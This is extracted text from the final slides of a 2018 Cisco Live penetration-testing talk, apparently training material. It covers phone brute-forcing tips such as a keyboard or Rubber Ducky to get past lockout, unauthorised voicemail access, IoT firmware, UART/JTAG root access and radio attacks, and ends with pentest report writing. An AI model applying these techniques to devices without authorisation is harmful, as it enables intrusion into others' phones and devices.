• Most phones lock if brute forced • TIP: Plug in a keyboard bypass this. • TIP2: Rubber Ducky abuses keyboard drivers and effective brute force tool
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 145 Many Commercial Tools Available
• Cellebrite or Elcomsoft are good but pricy! • Know even professional tools have limitations!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 146 Accessing Unauthorized Voicemail
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 147 Testing IoT Hacking IoT Lightbulbs Conference Blinky Things
Power plugs Cameras
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 149 Hacking IoT Lightbulbs Conference Blinky Things
• Micro drive or plug to access hardware
• Firmware security analysis and modification Power plugs Cameras • Radio- / wireless-based exploitation
• Application exploitation
• Hardware exploitation (example JTAG)
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 150 IoT Recon
• Mobile Application Downloads • Web dashboards and resources • Firmware or source code • Any available APIs • Plugs to access hard drive / removable storage
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 151 IoT Firmware
Firmware – Code running on the hardware (bootloader, file systems, kernel, etc.)
Many devices don’t validate firmware!
Call support for help!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 152 IoT Hardware Hacking
• Common for unauthenticated root when tapping into the hardware • Identify UART or JTAG pins • Use multimeter to find ground, transmit and receive • Connect to exploitation tool (ATTIFY Badge), adjust baud rate until you can read. Its likely to be unauthenticated.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 153 Radio Interfaces
• Software Defined Radio • ZigBee Exploitation • Bluetooth
Example Attack Methods
Man-in-the-middle attack Insecure CRC verification Replay attack Clear text
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 154 Reporting Language is Everything
• People can be terminated • Critical vulnerabilities could be overlooked • Money and time could be wasted • Choose your tone wisely • Expect various education types to read it • Include details (tools, time, process) • Define acronyms
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 156 Penetration Testing Report
• Target Audience – Who will read it • Report Classification – Could contain sensitive information • All information collected – Need to list everything (notes, screenshots, etc.) • Summary of findings • Summary of recommendation
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 157 Penetration Testing Report - Details
. Vulnerabilities – What you found . Impact – Potential damage
. Likelihood – How hard to execute
. Risk evaluation – Impact to business . Recommendation – Remediation steps
. References – Who worked on what
. Additional details – Appendices, Glossary, Tools used, etc.
Example Offensive Security https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 158 Wrap up
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 159 Threats will increase. Volume and sophistication.
BRKSEC-2460 160 Next Steps
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 161 Complete your online session evaluation
Give us your feedback to be entered into a Daily Survey Drawing. Complete your session surveys through the Cisco Live mobile app or on www.CiscoLive.com/us.
Don’t forget: Cisco Live sessions will be available for viewing on demand after the event at www.CiscoLive.com/Online.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 162 Continue Demos in Walk-in Meet the Related your the Cisco self-paced engineer sessions education campus labs 1:1 meetings
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 163 Thank you
#CLUS #CLUS